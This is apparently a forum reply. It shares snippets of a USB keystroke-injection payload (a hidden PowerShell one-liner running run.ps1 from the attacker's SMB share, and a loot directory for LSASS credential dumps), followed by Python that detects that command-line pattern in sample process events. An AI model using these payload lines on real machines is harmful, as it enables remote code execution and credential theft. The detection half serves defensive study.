Yes, that is what I did: here are some snippets from the payload I am working on:
In Payload.txt, do not forget to install tools...
/pentest/impacket/examples/smbserver.py -comment '...' b /loot/dump
QUACK STRING "powershell -WindowStyle Hidden -NoLogo -Exec Bypass \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1) { \\\172.16.64.1\b\run.ps1; exit } }\""
In my PowerShell script 'Run.ps1':
# Wait for SMB to get going
while (!(Test-Path "\\172.16.64.1\b\udisk\loot\LSASDump\")){
    Start-Sleep 2
    $I++
    if ($I -eq 10) {break} # don't wait too long...
}
# Loot directory
[String]$p = '\\172.16.64.1\b\udisk\loot\LSASDump\'
if (!(Test-Path $p)) {New-Item -Path $p -type directory | Out-Null}
I haven't published as I am still testing, but these should help.
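As an added example from the defender's side (not code from the original post), the Python below runs simple detection logic over constructed process-creation records and flags the command-line shape described above: a hidden PowerShell window, an execution-policy bypass, a reachability polling loop, and a script launched from an IP-addressed UNC share. The sample events, field names and indicator names are assumptions.

```python
import re

# Constructed sample process-creation records (Sysmon Event ID 1 style),
# not real telemetry. The first mirrors the command line from the post above.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell -WindowStyle Hidden -NoLogo -Exec Bypass "while ($true) { If (Test-Connection 172.16.64.1 -count 1) { \\172.16.64.1\b\run.ps1; exit } }"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell -NoProfile -File C:\Scripts\inventory.ps1"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe C:\Users\a\notes.txt"},
]

# Indicator patterns (case-insensitive, tolerant of PowerShell's abbreviated switches).
HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
BYPASS = re.compile(r"-e(x(ec(utionpolicy)?)?|p)?\s+bypass", re.I)
UNC_IP_SCRIPT = re.compile(r"\\\\\d{1,3}(\.\d{1,3}){3}\\[^\s;\"']+\.ps1", re.I)
PROBE_LOOP = re.compile(r"while\s*\(\s*\$true\s*\).*Test-Connection", re.I | re.S)


def score_event(event):
    """Return the indicator names matched by one process-creation event."""
    if not event["Image"].lower().endswith("powershell.exe"):
        return []
    cl = event["CommandLine"]
    hits = []
    if HIDDEN.search(cl):
        hits.append("hidden_window")
    if BYPASS.search(cl):
        hits.append("exec_policy_bypass")
    if UNC_IP_SCRIPT.search(cl):
        hits.append("script_from_ip_unc_share")
    if PROBE_LOOP.search(cl):
        hits.append("reachability_poll_loop")
    return hits


def find_suspicious(events, min_hits=2):
    """Return (index, indicators) for events matching at least min_hits indicators."""
    results = []
    for i, event in enumerate(events):
        hits = score_event(event)
        if len(hits) >= min_hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for idx, hits in find_suspicious(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```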